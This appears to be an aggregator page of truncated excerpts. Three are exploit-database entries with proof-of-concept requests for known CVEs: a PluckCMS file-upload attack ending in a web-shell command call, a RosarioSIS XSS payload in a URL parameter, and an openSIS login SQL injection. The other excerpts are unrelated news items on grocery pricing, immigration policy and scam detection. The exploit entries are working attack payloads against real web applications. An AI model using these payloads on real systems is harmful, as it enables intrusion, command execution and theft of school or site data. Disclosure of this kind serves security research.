PluckCMS 4.7.10 – Unrestricted File Upload

# Exploit Title: PluckCMS 4.7.10 – Unrestricted File Upload
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/pluck-cms/pluck/
# Software Link: https://github.com/pluck-cms/pluck/
# Version: 4.7.10
# Tested on: Windows
# CVE : CVE-2020-20969

Proof Of Concept

GET /admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file HTTP/1.1
Host: pluck
Cookie: PHPSESSID=[valid_session_id]

**Access Method:** http://pluck/files/exploit_copy.php?cmd=id

**Additional…

RosarioSIS 6.7.2 – Cross-Site Scripting (XSS)

# Exploit Title: RosarioSIS 6.7.2 – Cross-Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis
# Software Link: https://gitlab.com/francoisjacquet/rosariosis
# Version: 6.7.2
# Tested on: Windows
# CVE : CVE-2020-15718

Proof Of Concept

http://rosariosis/Modules.php?modname=Scheduling/PrintSchedules.php&search_modfunc=list&include_inactive=" onmouseover="alert(1)"

Steps to Reproduce

Log in as an admin user. Send the request. …

openSIS Community Edition 8.0 – SQL Injection

# Exploit Title: openSIS Community Edition 8.0 – SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/OS4ED/openSIS-Classic
# Software Link: https://github.com/OS4ED/openSIS-Classic
# Version: 8.0
# Tested on: Windows
# CVE : CVE-2021-40617

Proof Of Concept

GET /ForgotPassUserName.php?used_for=username&u=test%27%20OR%20%271%27%3D%271&user_type=student HTTP/1.1
Host: opensis
Connection: close

Steps to…

Your Data Might Determine How Much You Pay for Eggs

If you’re near Rochester, New York, the price for a carton of Target’s Good & Gather eggs is listed as $1.99 on its website. If you’re in Manhattan’s upscale Tribeca neighborhood, that price changes to $2.29. It’s unclear why the prices differ, but a new notice on Target’s website offers a potential hint: “This price…

Potential “Chilling Effects” of Public Charge and Other Immigration Policies on Medicaid and CHIP Enrollment

Summary The Department of Homeland Security (DHS) released a proposed rule that would rescind 2022 Biden-era public charge determination regulations. In their place, DHS plans to provide interpretive and policy tools to guide public charge determinations and suggests it will “move away from a bright line primary dependence standard” and remove limitations on the types of public…

Detect scams using Circle to Search and Google Lens

One trending tactic among scammers involves sending fraudulent text messages, either directly to your phone or through messaging apps and social media sites. These messages often solicit or demand money and link out to scammy sites. To help you spot these scams, we’ve now added new capabilities to Circle to Search and Lens that will…